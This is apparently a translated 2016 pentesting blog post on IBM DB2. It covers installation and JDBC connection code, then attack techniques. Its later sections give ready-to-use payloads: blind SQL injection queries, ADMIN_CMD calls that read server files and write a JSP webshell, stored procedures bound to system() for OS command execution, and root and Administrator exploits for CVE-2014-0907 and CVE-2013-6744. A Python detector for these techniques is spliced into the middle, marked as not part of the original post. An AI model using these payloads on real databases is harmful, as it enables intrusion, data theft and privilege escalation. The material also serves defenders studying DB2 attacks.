Wait for TA to come back · 2016/06/17 10:30

0x00 A brief introduction to DB2


DB2 is IBM’s relational database management system.

DB2 today consists of three main families:

  • DB2 for Linux, UNIX and Windows (LUW)
  • DB2 for z/OS
  • DB2 for i (formerly OS/400)

IBM DB2 is targeted at the high end of the market and is widely used in enterprise applications.

0x01 Installation of DB2


The following two sections describe the installation of DB2 V9.5 on Linux and on Windows respectively.

DB2 installation under Linux

On Linux, DB2 depends on the compat-libstdc++ library, which must be installed before DB2 itself.

After installing that library, run db2setup from the DB2 installation package to launch the graphical installer.

During installation DB2 creates the users db2inst1, db2fenc1 and dasusr1 as operating system users; they can also be created before the installation.

Once the installation is complete, switch to the db2inst1 user and run db2cc to start the graphical Control Center (DB2 no longer ships a graphical Control Center from V10.1 onward; it can be managed from the command line or with the Data Studio tool provided by IBM).

DB2 installation under Windows

Run setup.exe from the installation package to begin the installation; during installation the db2admin user is created and added to the Administrators group.

Start the Control Center when the installation is complete.

0x02 Use of DB2


DB2 services and ports

You can use the following methods to view the DB2 service names and ports:

Linux:

The /etc/services file

Windows:

The C:\Windows\System32\drivers\etc\services file

By default, DB2 listens for connections on port 50000.

DB2 users

All users of DB2 are operating system users, and the user password is bound to that user’s password on the operating system.

Under Linux, installing DB2 creates db2inst1, db2fenc1, and dasusr1 users. On Windows, the db2admin user is created and added to the administrator group.

Not every local operating system user is a DB2 user: an operating system user must first be granted database authorities through DB2's administration functions.

Local administration of DB2

Command-line mode

DB2 databases can be managed locally using the command line or graphical tools.

The IBM DB2 Universal Database (UDB) Command Line Processor (CLP) is a convenient interface to DB2 functions; it accepts commands or SQL statements from the DB2 command line.

On Linux and UNIX-based systems, this is the command line of the DB2 instance.

On Windows, it is a command window with the CLP environment enabled; you must first run the db2cmd command (from a normal command window) to start the DB2 command line environment.

CLI in Windows:

Command line in Linux:

For details on using the command line, see the IBM official documentation.

GUI mode

You can use DB2's Control Center to manage DB2 locally and graphically, as follows:

Windows:

Linux:

Note: DB2 no longer includes a graphical Control Center starting with V10.1; it can be replaced by the Data Studio tool provided by IBM.

Remote administration of DB2

DB2 can be managed remotely in either CLI or GUI mode. To manage DB2 remotely in CLI mode, install the DB2 client, which can be downloaded from the IBM website.

Remote graphical management can be done with the Quest Central for DB2 tool, which also requires the DB2 client.

The tool can be used as follows:

Right-click to add DB2 server:

Configure the DB2 server address and operating system:

Configure the node name, instance name, and database port:

Right-click the instance, choose to manage logins, and configure the login credentials:

Right-click on an instance to add a database:

State after the database has been added:

Executing an SQL statement:

Connecting to DB2 from a Java program

There are four ways for Java programs to connect to DB2: TYPE1, TYPE2, TYPE3 and TYPE4, of which TYPE2 and TYPE4 are widely used. The basic architecture of each is as follows:

TYPE1:

TYPE2:

TYPE3:

TYPE4:

The following describes how to connect to DB2 using TYPE2 and TYPE4.

To use TYPE2, the DB2 client must be installed, and the target databases must be added and given aliases in the client; this can be done from the client command line or with the graphical Configuration Assistant, as shown in the following figure.

There are two ways to use TYPE2:

Method 1:

The driver is in the db2jcc.jar package, and on Windows the JDK must be able to find db2jdbc.dll and db2jcct2.dll, which are located in the SQLLIB\BIN directory of the DB2 client.

The connection code is as follows:

```java
import java.sql.Connection;
import java.sql.DriverManager;

// TYPE2 connection through the db2jcc.jar driver; TESTDB2 is the alias configured in the DB2 client
Class.forName("com.ibm.db2.jcc.DB2Driver").newInstance();
Connection conn = DriverManager.getConnection("jdbc:db2:TESTDB2", "db2admin", "123456");
```

TESTDB2 in jdbc:db2:TESTDB2 is the database alias added in the client.

Method 2:

The driver is in the db2java.zip package, and on Windows the JDK must be able to find db2jdbc.dll, which is located in the SQLLIB\BIN directory of the DB2 client.

The connection code is as follows:

```java
import java.sql.Connection;
import java.sql.Driver;
import java.sql.DriverManager;

// TYPE2 connection through the legacy db2java.zip driver, registered explicitly
Driver driver = (Driver) Class.forName("COM.ibm.db2.jdbc.app.DB2Driver").newInstance();
DriverManager.registerDriver(driver);
Connection conn = DriverManager.getConnection("jdbc:db2:TESTDB2", "db2admin", "123456");
```

TESTDB2 in jdbc:db2:TESTDB2 is the database alias added in the client.

Note: db2java.zip has been disabled in DB2 LUW 10.1; the db2jcc.jar driver is recommended if you want to use TYPE2.

Connecting to DB2 using TYPE4:

The driver is in the db2jcc.jar package, and no additional software needs to be installed on the host running the application.

Connection code:

```java
import java.sql.Connection;
import java.sql.DriverManager;

// TYPE4 connection: the driver talks directly to the server over the network, no DB2 client needed
Class.forName("com.ibm.db2.jcc.DB2Driver").newInstance();
Connection conn = DriverManager.getConnection("jdbc:db2://192.168.60.144:50000/TESTDB2", "db2admin", "123456");
```

Note:

  1. With TYPE4 the database code page must be UTF-8; otherwise an error is returned.
  2. TYPE4 also requires db2jcc_license_cu.jar.

The driver packages above (db2jcc.jar, db2jcc_license_cu.jar and db2java.zip) can be found in the DB2 server installation directory, for example SQLLIB\java under the DB2 installation directory on Windows with V9.5.

The db2jcc.jar and db2java.zip drivers differ in error handling.

When a query fails on the DB2 server side, the db2java.zip driver returns error messages generated by the DB2 server to the application as is, while the db2jcc.jar driver uses custom error messages.

Error message for db2java.zip:

Error message for db2jcc.jar:

0x03 DB2 SQL injection


Statements to get DB2 database information

Get the database version:

```sql
SELECT service_level FROM table(sysproc.env_get_inst_info()) AS instanceinfo
```

Get the current user:

```sql
SELECT user FROM sysibm.sysdummy1;
SELECT session_user FROM sysibm.sysdummy1;
SELECT system_user FROM sysibm.sysdummy1;
```

Get the database users:

```sql
SELECT DISTINCT(authid) FROM sysibmadm.privileges;
SELECT DISTINCT(grantee) FROM sysibm.systabauth;
```

Obtain database table permissions:

```sql
SELECT * FROM syscat.tabauth
```

Obtain the permissions of the current user:

```sql
SELECT * FROM syscat.tabauth WHERE grantee = CURRENT USER
```

List the database DBA accounts:

```sql
SELECT DISTINCT(grantee) FROM sysibm.systabauth WHERE controlauth = 'Y'
```

Get the current database:

```sql
SELECT CURRENT SERVER FROM sysibm.sysdummy1
```

Get all tables in the current database:

```sql
SELECT table_name FROM sysibm.tables;
SELECT name FROM sysibm.systables;
```

Get all columns in the current database:

```sql
SELECT name, tbname, coltype FROM sysibm.syscolumns
```

Obtain information about the host where the database resides:

```sql
SELECT * FROM sysibmadm.env_sys_info
```

DB2 SQL statement features

Comments:

DB2 uses a double hyphen (--) for single-line comments and /* */ for multi-line comments.

Limiting the number of rows returned:

```sql
SELECT * FROM sysibm.systables ORDER BY name ASC FETCH FIRST N ROWS ONLY
```

Substring:

```sql
SELECT substr('abc', 2, 1) FROM sysibm.sysdummy1
```

The above statement returns the character b.

Bit operations (AND/OR/NOT/XOR):

```sql
SELECT bitand(1, 0) FROM sysibm.sysdummy1
```

The above statement returns 0.

Conversion between characters and ASCII:

```sql
SELECT chr(65) FROM sysibm.sysdummy1

```

The above statement returns the character 'A'.

```sql
SELECT ascii('A') FROM sysibm.sysdummy1
```

The above statement returns 65, the ASCII code of the character 'A'.

Type conversion:

```sql
SELECT cast('123' AS integer) FROM sysibm.sysdummy1
```

The above statement converts the string '123' to the integer 123.

```sql
SELECT cast(1 AS char) FROM sysibm.sysdummy1
```

The above statement converts the number 1 to the string '1'.

String concatenation:

```sql
SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1;
SELECT 'a' || 'b' || 'c' FROM sysibm.sysdummy1;
```

Both statements return the string 'abc'.

Get the length of a value:

```sql
SELECT LENGTH(NAME) FROM SYSIBM.SYSCOLUMNS WHERE TBNAME = 'VOTE' ORDER BY NAME DESC FETCH FIRST 1 ROWS ONLY
```

Conditional statement:

```sql
SELECT CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END FROM sysibm.sysdummy1
```

The above statement returns the string 'AAAAAAAAAA'.

Time delay:

```sql
and (SELECT count(*) FROM sysibm.columns t1, sysibm.columns t2, sysibm.columns t3) > 0
and (SELECT ascii(substr(user, 1, 1)) FROM sysibm.sysdummy1) = 68
```

The above condition causes a delay if the ASCII code of the first character of user is 68.

The UNION operator:

DB2 supports the UNION operator in SELECT statements, but the corresponding columns of the UNION must have the same type, otherwise an error is raised.

The form SELECT ... FROM ... UNION SELECT NULL, NULL ... FROM ... therefore cannot be used directly. In DB2 the type of each NULL in the SELECT list must be specified with CAST, as follows:

```sql
SELECT ... cast(NULL AS int) AS column_A, cast(NULL AS varchar(128)) AS column_B, ... FROM ...
```

Multi-statement queries:

DB2 does not support multi-statement queries of the form statement1; statement2.

SQL injection methods for DB2

The common approach to SQL injection against DB2 is blind injection, using the statements from the previous two subsections to obtain database information.

Because of DB2's stricter UNION operator, UNION injection often fails, and because DB2 does not support multi-statement queries, stored procedures cannot be invoked through stacked queries.

In addition, the database's error messages can be used to obtain some sensitive information through SQL injection, as follows:

Guess the number of columns using the usual ORDER BY method.

Add "group by 1" to the query condition: the error message reveals the name of the table's first column, ID. Change the condition to "group by ID" and the error reveals the second column, NAME. Keep appending the revealed column names after group by, e.g. "group by ID, NAME", to enumerate all the columns of the current table.

SQL injection tool for DB2

Among SQL injection tools, sqlmap is the most usable against DB2, as shown in the following screenshot:

However, testing shows it still has some problems, such as retrieving column information incompletely and handling blind injection poorly.

0x04 Reading and writing operating system files using DB2


In penetration testing, DB2 can be used to read and write system files, obtain sensitive information, write webshells, and so on.

The method described in this section was tested successfully on DB2 V9.5 on both Windows and Linux.

Reading operating system files using DB2

The DB2 IMPORT command reads a file and inserts its contents into a database table:

```sql
IMPORT FROM C:\Windows\win.ini OF DEL INSERT INTO CONTENT
```

This inserts the contents of C:\Windows\win.ini into the table CONTENT.

The DB2 ADMIN_CMD stored procedure, in the SYSPROC schema, executes DB2 command line processor (CLP) commands. It was introduced in version 8.2.2 and has the syntax:

```sql
ADMIN_CMD('command_string')
```

The command_string argument is the command to run.

To call a stored procedure, use the CALL statement:

```sql
CALL ADMIN_CMD('command_string')
```

Calling the ADMIN_CMD stored procedure to run the IMPORT command and read a file into a database table:

```sql
CALL ADMIN_CMD('IMPORT FROM C:\Windows\win.ini OF DEL INSERT INTO CONTENT');
```

The result of running the stored procedure:

A user connected to the database remotely can therefore read operating system files by calling the ADMIN_CMD stored procedure. As tested on DB2 V9.5, ordinary database users have permission to call ADMIN_CMD by default. Such a user first creates a table (or holds INSERT and SELECT privileges on a table named in an existing IMPORT command) and then calls ADMIN_CMD to run IMPORT, reading the file into that table. As follows:

Connecting to the database remotely and calling the ADMIN_CMD stored procedure to run the IMPORT command:

Reading the file contents:

Writing files to the operating system using DB2

The DB2 EXPORT command writes the result of a database query to a file, with the following syntax:

```sql
EXPORT TO result.csv OF DEL MODIFIED BY NOCHARDEL SELECT col1, col2, coln FROM testtable;
```

Running the command through the ADMIN_CMD stored procedure from the previous section:

```sql
CALL SYSPROC.ADMIN_CMD('EXPORT TO C:\RESULT.TXT OF DEL MODIFIED BY NOCHARDEL SELECT * FROM VOTENAME');
```

Procedure call and result:

A user connected to the database remotely can create a table (or hold SELECT privilege on a table named in the EXPORT command) and then call the ADMIN_CMD stored procedure to run EXPORT, writing a file to the operating system.

The syntax for writing a file containing an arbitrary string to the operating system is as follows:

```sql
CALL SYSPROC.ADMIN_CMD('EXPORT TO C:\RESULT.TXT OF DEL MODIFIED BY NOCHARDEL SELECT ''My Content'' FROM VOTENAME FETCH FIRST 1 ROWS ONLY');
```

Result of remote call:

The same method is used to write a webshell:

```sql
CALL SYSPROC.ADMIN_CMD('EXPORT TO C:\RESULT.jsp OF DEL MODIFIED BY NOCHARDEL SELECT ''<%if(request.getParameter("f")!=null){(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("c").getBytes()); response.getWriter().print("[OK]"); }%>'' FROM VOTENAME FETCH FIRST 1 ROWS ONLY');
```

Result of remote call:

Note: when a user-defined string is written to a file through EXPORT, at least one record must exist in the table named in the SELECT; otherwise the written file is empty.

0x05 Executing operating system commands using DB2


DB2 stored procedures can be used to execute operating system commands. The remotely connected user must have permission to create stored procedures; after connecting to the database, the user creates a stored procedure that executes operating system commands and then calls it.

The syntax for creating and calling this stored procedure is as follows:

Windows:

```sql
CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200))
  EXTERNAL NAME 'c:\windows\system32\msvcrt!system'
  LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL;

CALL db2_cmd_exec('whoami /all > C:\whoami.log');
```

Linux:

```sql
CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200))
  EXTERNAL NAME '/usr/lib/libstdc++.so.6!system'
  LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL;

CALL db2_cmd_exec('whoami > /tmp/whoami.log');
```

Results:

Note:

Stored procedures are FENCED (protected) by default. For example, on DB2 under Linux, a stored procedure created and run by a session connected as db2inst1 actually runs on the DB2 server as the user db2fenc1.

FENCED procedures run in a separate address space, while UNFENCED procedures share the address space of the calling process. FENCED procedures are generally safer.

To create a NOT FENCED stored procedure (which requires SYSADM authority, DBADM authority, or the special CREATE_NOT_FENCED privilege), specify NOT FENCED when the procedure is created, as shown below:

```sql
CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200))
  EXTERNAL NAME '/usr/lib/libstdc++.so.6!system'
  LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL NOT FENCED
```
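From the defender's side, the three techniques above (the catalog cross-join time delay from 0x03, ADMIN_CMD wrapping IMPORT/EXPORT for file access from 0x04, and external C routines bound to system() or declared NOT FENCED from 0x05) are all visible in the statement text. The following Python detector, added here and not part of the original post, scores statements against those patterns; the sample statements are constructed and written the way an application or proxy statement log might record them, not in any real DB2 audit format.

```python
import re
from typing import Callable, List, Tuple

# Constructed sample statements (NOT a real db2audit format): what an
# application-side or proxy statement log might capture.
SAMPLE_STATEMENTS = [
    "SELECT name FROM vote WHERE id = 42",
    "CALL SYSPROC.ADMIN_CMD('IMPORT FROM C:\\Windows\\win.ini OF DEL INSERT INTO CONTENT')",
    "CALL ADMIN_CMD('EXPORT TO C:\\RESULT.jsp OF DEL MODIFIED BY NOCHARDEL "
    "SELECT ''x'' FROM VOTENAME FETCH FIRST 1 ROWS ONLY')",
    "CREATE PROCEDURE db2_cmd_exec (IN cmd varchar(200)) "
    "EXTERNAL NAME 'c:\\windows\\system32\\msvcrt! system' LANGUAGE C "
    "DETERMINISTIC PARAMETER STYLE DB2SQL NOT FENCED",
    "SELECT id FROM vote WHERE id = 1 and (SELECT count(*) FROM sysibm.columns t1, "
    "sysibm.columns t2, sysibm.columns t3)>0 and "
    "(SELECT ascii(substr(user,1,1)) FROM sysibm.sysdummy1)=68",
    "CALL SYSPROC.ADMIN_CMD('RUNSTATS ON TABLE VOTE')",
]

def _catalog_cross_join(stmt: str) -> bool:
    """Three or more references to SYSIBM.COLUMNS in one statement: the
    cross-join used as the time-delay primitive in blind injection."""
    return len(re.findall(r"\bsysibm\.(?:sys)?columns\b", stmt, re.I)) >= 3

# Each rule is (name, predicate); regex rules are wrapped so all are callables.
RULES: List[Tuple[str, Callable[[str], bool]]] = [
    # ADMIN_CMD used for file I/O: IMPORT reads a server file, EXPORT writes one.
    ("admin_cmd_file_io",
     lambda s: re.search(r"admin_cmd\s*\(\s*'\s*(import\s+from|export\s+to)\b", s, re.I) is not None),
    # External C routine bound to the C runtime's system() entry point ("lib!system").
    ("external_routine_system",
     lambda s: re.search(r"external\s+name\s+'[^']*!\s*system'", s, re.I) is not None),
    # Routine asked to run in the engine's address space instead of the fenced process.
    ("not_fenced_routine",
     lambda s: re.search(r"\bnot\s+fenced\b", s, re.I) is not None),
    ("catalog_cross_join_delay", _catalog_cross_join),
]

def classify(stmt: str) -> List[str]:
    """Return the names of every rule the statement triggers, in RULES order."""
    return [name for name, pred in RULES if pred(stmt)]

def scan(statements: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (index, rule names) for each statement that triggers at least one rule."""
    hits = []
    for i, stmt in enumerate(statements):
        names = classify(stmt)
        if names:
            hits.append((i, names))
    return hits

if __name__ == "__main__":
    for i, names in scan(SAMPLE_STATEMENTS):
        print(f"[{i}] {', '.join(names)}: {SAMPLE_STATEMENTS[i][:70]}")
```

Ordinary ADMIN_CMD use such as RUNSTATS is deliberately not flagged, so the rules can be fed from a busy statement log without drowning in maintenance jobs.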

0x06 DB2 privilege escalation


This section introduces the principles and exploitation of two DB2 privilege escalation vulnerabilities.

CVE-2014-0907

CVE-2014-0907 is a local privilege escalation vulnerability in DB2 that affects DB2 V9.5 on AIX, Linux, HP-UX and Solaris (V9.5 before FP9 is not affected), as well as V9.7, V10.1 and V10.5.

CVE-2014-0907 allows an ordinary local user to obtain root privileges.

DB2's db2iclean program searches the current directory for the library file libdb2ure2.so.1, as the following strace run shows:

```shell
strace -o /tmp/db2iclean.log /home/db2inst1/sqllib/adm/db2iclean
```

If the current directory contains a library file of that name written by a malicious user, the DB2 program loads it and executes the code inside. Since db2iclean is SUID root, the malicious code runs as root.

For example, compile the following code into a library file and place it in the current directory:

```cpp
// libdb2ure2.cpp
#include <stdlib.h>

int iGetHostName(char* n, int i) {
    system("id > /m.log");
    return 0;
}
```

```shell
gcc -shared -o libdb2ure2.so.1 libdb2ure2.cpp
```

Run the db2iclean program as an ordinary user belonging to the db2iadm1 group:

```shell
<DB2_instance_install_directory>/adm/db2iclean
```

The euid is 0, so the code runs as root.

Note: because db2iclean is not executable by everyone, the attacker must run it as a member of the db2iadm1 group, or trick a member of that group into running the program from a directory where the attacker has placed the malicious library.

CVE-2013-6744

CVE-2013-6744 is a DB2 privilege escalation vulnerability on Windows that allows an ordinary Windows user to obtain Administrator rights.

Affected DB2 versions:

  • 9.5 and 9.7 before FP9a
  • 10.1 before FP3a
  • 10.5 before FP3a

Exploiting this vulnerability requires a user with access to the DB2 database and the privilege to create external routines (CREATE_EXTERNAL_ROUTINE).

On Windows, the DB2 service runs under a privileged account and by default performs no access control check, which means that a user holding CREATE_EXTERNAL_ROUTINE can create and call a routine backed by a library file to escalate privileges.

Exploitation steps:

1. Run the following DDL as a user holding CREATE_EXTERNAL_ROUTINE to create a stored procedure backed by the C runtime's system function:

```sql
CREATE PROCEDURE db2_exec (IN cmd varchar(1024))
  EXTERNAL NAME 'msvcrt!system'
  LANGUAGE C DETERMINISTIC PARAMETER STYLE DB2SQL
```

2. Call the stored procedure just created:

```sql
CALL db2_exec('whoami /all > C:\whoami.log')
```

Inspecting the whoami.log file created by the command shows that it contains the db2admin account's information, meaning the command was executed with administrator privileges from a non-administrator account.
